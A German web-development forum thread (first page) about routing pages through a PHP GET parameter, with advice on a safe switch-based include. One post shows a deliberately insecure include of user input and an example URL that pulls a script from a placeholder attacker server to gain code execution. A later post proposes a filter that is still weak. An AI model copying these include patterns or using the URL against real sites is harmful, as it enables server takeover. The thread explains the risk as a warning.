+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 15 von 18

Thema: index.php?=start - Lange gesucht, nichts gefunden - Experten gesucht :-)

  1. #1
    TP-Junior Twisted Pair macht alles soweit korrekt
    Registriert seit
    Feb 2005
    Beiträge
    29

    index.php?=start - Lange gesucht, nichts gefunden - Experten gesucht :-)

    Guten Tag zusammen,

    also ich bin das neue Mitglied hier und habe ein Problem. Ich weiß nicht mehr wie ich das gemacht hatte damals aber ich möchte die Funktion wieder haben. Leider finde ich den Codeschnipsel nicht mehr auf meinen CDs

    Es geht ja darum dass man statt normal start.php einfach index.php?=start verwenden kann oder so ähnlich. Dazu muss ich doch in die Index Datei einen Code-Schnipsel stecken und dann in jede andere Datei mit dem gewünschten Namen wie: Start oder Seite2, Seite3.

    Tja aber wie mache ich das nur? Ich habe jetzt schon den ganzen Tag wieder gesucht in den Foren und Databases, aber nicht wirklich das gefunden nach was ich suche.

    Hier mein teilweise richtiger Code mal

    In die Hauptdatei:

    <?php
    $path = 'includes/';
    $extension = '.inc';
    include($index);
    }
    ?>


    ---------------

    In jede andere Datei:

    <?php
    $start;
    ?>

    ---------------

    Beim ersten oben mault er rum wegen dem Pfad bzw. den Ordner, und beim zweiten das geht ja somit noch nicht. Wobei das wahrscheinlich auch nicht richtig geschrieben wurde. Fehlt etwas oder was weiß ich. Ist schon lange her wo ich damit noch rumgesielt habe.


    Bin für jede Hilfe dankbar !

  2. #2
    Guest Strogij hilft, wo's geht Strogij hilft, wo's geht
    Registriert seit
    Aug 2002
    Beiträge
    2.233
    Du meinst wahrscheinlich so eine Weiche:
    PHP-Code:
    switch ($_GET['seite'])
        { 
        case 
    'start':
        include(
    'start.php');

        break; 

        case 
    'impressum'
        include(
    'impressum.php');
        
        break; 

        default: 
        include(
    '404.php');

        break; 
        } 
    Aufruf mit xxx.php?seite=start, xxx.php?seite=impressum...

  3. #3
    TP-Junior Twisted Pair macht alles soweit korrekt
    Registriert seit
    Feb 2005
    Beiträge
    29
    Jain. Eine Weiche war das gar nichtmal. Ich hab nur was in der Index gehabt und dann in allen anderen Dateien.

    In der Navigation hab ich dann alles eben so verlinkt: index.php?=start oder index.php?=tipps

    Ich weiß nicht in wie fern eine Weiche gut sein soll. Sowas habe ich leider noch nie gebraucht

    -----------
    EDIT:

    Habs aber verstanden
    Aufruf mit: http://www.web-jumber.de/index.php?BEEPWARE-ID=start funktioniert auch.

    Thank you very much
    Geändert von Twisted Pair (09.02.2005 um 14:26 Uhr)

  4. #4
    Guest Strogij hilft, wo's geht Strogij hilft, wo's geht
    Registriert seit
    Aug 2002
    Beiträge
    2.233
    Mit deiner Version kann man auf jede Datei zugreifen (auch von anderen Servern), das stellt ein Risiko dar, weil es dann auch durch PHP geparst wird.

  5. #5
    TP-Junior Twisted Pair macht alles soweit korrekt
    Registriert seit
    Feb 2005
    Beiträge
    29
    Ahso, das wäre nich so toll. Auf jedenfall Danke Dir.
    Sag mal, stimmt Deine ICQ-Nummer? Hab Dich mal vorsichtshalber hinzugefügt in meine Liste *g

    Klappt soweit ganz gut mit dem Switch. Aber ist es jetzt noch möglich dass wenn man www.web-jumber.de eingibt auch auf start gezwungen wird. So dass man am Anfang nicht das index.php?= eingeben muss. Ich hab das irgendwo heute schonmal gelesen. Frägt sich nur wo *gg

    Irgendwas mit start.php Zwang wenn es keine andere Seite gibt oder sowas.

    -------
    EDIT: mmh ja, bin ein schnell checker heut. habs schon Default umschreiben als start statt 404.php Sorry
    Geändert von Twisted Pair (09.02.2005 um 15:27 Uhr)

  6. #6
    TP-Veteran walter hilft, wo's geht walter hilft, wo's geht walter hilft, wo's geht Avatar von walter
    Registriert seit
    Jan 2004
    Ort
    Bayern, Dürnhart
    Beiträge
    1.446
    Du kannst ja noch eine Codeschnipsel einfügen, das wenn keine Variable per GET übergeben wird, das dann immer auf die Startseite gesprungen wird.

    Etwa so was:
    PHP-Code:
    if(!isset($_GET['seite']))
    {
    include(
    'deineStartseite.php');


  7. #7
    321
    321 ist offline
    TP-Specialist 321 hilft, wo's geht 321 hilft, wo's geht 321 hilft, wo's geht Avatar von 321
    Registriert seit
    Nov 2004
    Ort
    Die Insel in Europa die aus Europa erst Europa macht _________________________ Nähe Lenzburg
    Beiträge
    4.248
    auch damit kann man jede beliebige Seite aufrufen!

    Ich prüfe auch noch zusätzlich, dass keine / im Namen sind und habe alle include-Seiten in einem eigenen Ordner und nur aus diesem wird includet.
    [321 Name="Joe"]
    wie immer, lieber gleich mit notepad, dem Editor meines Vertrauens
    [/321]


    use my HTML-Tester

    Motto'06: Mut zur deutschen Sprache!

  8. #8
    TP-Insider skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE Avatar von skipperjan
    Registriert seit
    Jan 2005
    Ort
    Düsseldorf
    Beiträge
    981
    Du kannst ja relativ einfach testen, ob die Datei bei dir existiert, und nicht irgendwas anderes repräsentiert, hatten wir vor ein paar Tagen auch schon mal wieder:

    http://www.traum-projekt.com/forum/s...ad.php?t=59591

    Aber so ist es sehr unsicher.

    So long,

    skipperjan
    Chenaski - Klamotten designed by Pete
    USE - nicht immer nur mit Stars and Stripes rumlaufen!

    Hunde in der Großstadt: Guck mal wo ich fast reingetreten bin.....

  9. #9
    321
    321 ist offline
    TP-Specialist 321 hilft, wo's geht 321 hilft, wo's geht 321 hilft, wo's geht Avatar von 321
    Registriert seit
    Nov 2004
    Ort
    Die Insel in Europa die aus Europa erst Europa macht _________________________ Nähe Lenzburg
    Beiträge
    4.248
    Dadurch dass ich nur aus dem einen Ordner include, kann nichts fremdes oder falsches mehr reingezogen werden.
    [321 Name="Joe"]
    wie immer, lieber gleich mit notepad, dem Editor meines Vertrauens
    [/321]


    use my HTML-Tester

    Motto'06: Mut zur deutschen Sprache!

  10. #10
    TP-Junior Twisted Pair macht alles soweit korrekt
    Registriert seit
    Feb 2005
    Beiträge
    29
    Ich habs jetzt auch so gemacht aus dem Ordner includes alles genommen.

    <?php
    switch ($_GET['BEEPWARE-ID'])
    {


    // Allgemein

    default:
    include('includes/start.php');

    break;

    case 'ueber_uns':
    include('includes/ueber_uns.php');

    break;

    case 'downloads':
    include('includes/downloads.php');

    break;

    case 'impressum':
    include('includes/impressum.php');

    break;

    Funktioniert einwandfrei

  11. #11
    TP-Veteran walter hilft, wo's geht walter hilft, wo's geht walter hilft, wo's geht Avatar von walter
    Registriert seit
    Jan 2004
    Ort
    Bayern, Dürnhart
    Beiträge
    1.446
    Kann mir das jemand noch mal erklären warum das unsicher ist, und man damit eine beliebige Seite aufrufen kann?

    PHP-Code:
    if(!isset($_GET['seite']))
    {
    include(
    'deineStartseite.php');


  12. #12
    TP-Specialist Dennis The Menace bringt sich richtig ein Dennis The Menace bringt sich richtig ein Avatar von Dennis The Menace
    Registriert seit
    Nov 2004
    Ort
    Ich komme aus dem Zauberwald
    Beiträge
    2.035
    @walter999:

    An den von dir gerade geposteten Code ist nichts unsicher. Unsicher wäre z.b.:

    PHP-Code:
    if( isset($_GET['seite']) ) 
      include(
    $_GET['seite' '.php'); 
    Weil du so einen Angreifer die Möglichkeit gibst, fremde .php Dateien einzubinden.
    http://deinserver.de/index.php?seite=http://boeserserver.de/boesesPhpSkript

    Und schon würde dein Server meine boese PHP Datei inkludieren, und schon stehen dem Angreifer sämtliche Möglichkeiten, die PHP bietet, zur Verfügung. Dank shell_exec generell alles.
    Zwei Dinge sind Unbestreitbar:
    • In einem Land, in dem Amerika Krieg führt, herrscht nachher Demokratie.
    • Die Erde ist eine Scheibe!
    Aktuelle Abendlektüre: Stephen King, Peter Strauch: Das schwarze Haus (Black House, 2001)
    Aktuelle Bewertung: Abgesehen davon, dass der Roman mal wieder demonstriert, dass der Author geistesgestört ist, sehr träge; wenig Spannung; schlechter Erzählstil. King halt^^!

  13. #13
    TP-Insider skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE skipperjan ist ein richtiges Arbeitstier - DANKE Avatar von skipperjan
    Registriert seit
    Jan 2005
    Ort
    Düsseldorf
    Beiträge
    981
    Dito!

    wenn deine Abfrage also nur statische Auswirkungen hat weil fest verdrahtet, dann ist das wurscht. Normalerweise werden solche Konstrukte gerne zur dynamischen Navigation genutzt, und dann wäre das von Dennis gepostete BSP fatal.

    So long,

    skip
    Chenaski - Klamotten designed by Pete
    USE - nicht immer nur mit Stars and Stripes rumlaufen!

    Hunde in der Großstadt: Guck mal wo ich fast reingetreten bin.....

  14. #14
    TP-Veteran walter hilft, wo's geht walter hilft, wo's geht walter hilft, wo's geht Avatar von walter
    Registriert seit
    Jan 2004
    Ort
    Bayern, Dürnhart
    Beiträge
    1.446
    Danke ihr zwei.

    Ich zwifelte schon an mir.
    Dachte schon das mein Beispiel ja kein Einbinden fremder Dateien gestattet. Die andere unsichere Lösung habe ich schon verstanden.

    Schönen Abend!

  15. #15
    TP-Moderator Adromir lebt für das TP und seine User Adromir lebt für das TP und seine User Adromir lebt für das TP und seine User Adromir lebt für das TP und seine User Adromir lebt für das TP und seine User Adromir lebt für das TP und seine User Adromir lebt für das TP und seine User Adromir lebt für das TP und seine User Avatar von Adromir
    Registriert seit
    Jun 2004
    Ort
    Hannover
    Beiträge
    4.806
    Mal eine Frage:
    PHP-Code:
    if (substr_count($_GET[action], "/") == 0) include("$_GET[action].inc.php"); 
    Wäre doch auch sicher? Sobald jemand irgendeine URL dort übergeben würde, wäre die Bedingung nicht mehr erfüllt und nichts includet, oder?

+ Antworten
Seite 1 von 2 1 2 LetzteLetzte

Ähnliche Themen

  1. amazon logo als .eps oder .ai gesucht
    Von Flixxtoras im Forum PrePress
    Antworten: 4
    Letzter Beitrag: 19.01.2003, 20:24
  2. META-Tags gesúcht!
    Von bagu1 im Forum HTML & CSS
    Antworten: 2
    Letzter Beitrag: 09.09.2002, 09:56
  3. Mit Dw4 erstellte Seiten werden erst nach "aktualisieren" gefunden !?
    Von Bludgeon im Forum Dreamweaver & andere Webeditoren
    Antworten: 8
    Letzter Beitrag: 15.08.2001, 09:41
  4. Weltbeste Cracker gesucht....
    Von anrebe im Forum Einfach so ...
    Antworten: 0
    Letzter Beitrag: 27.07.2001, 06:27

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

     

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51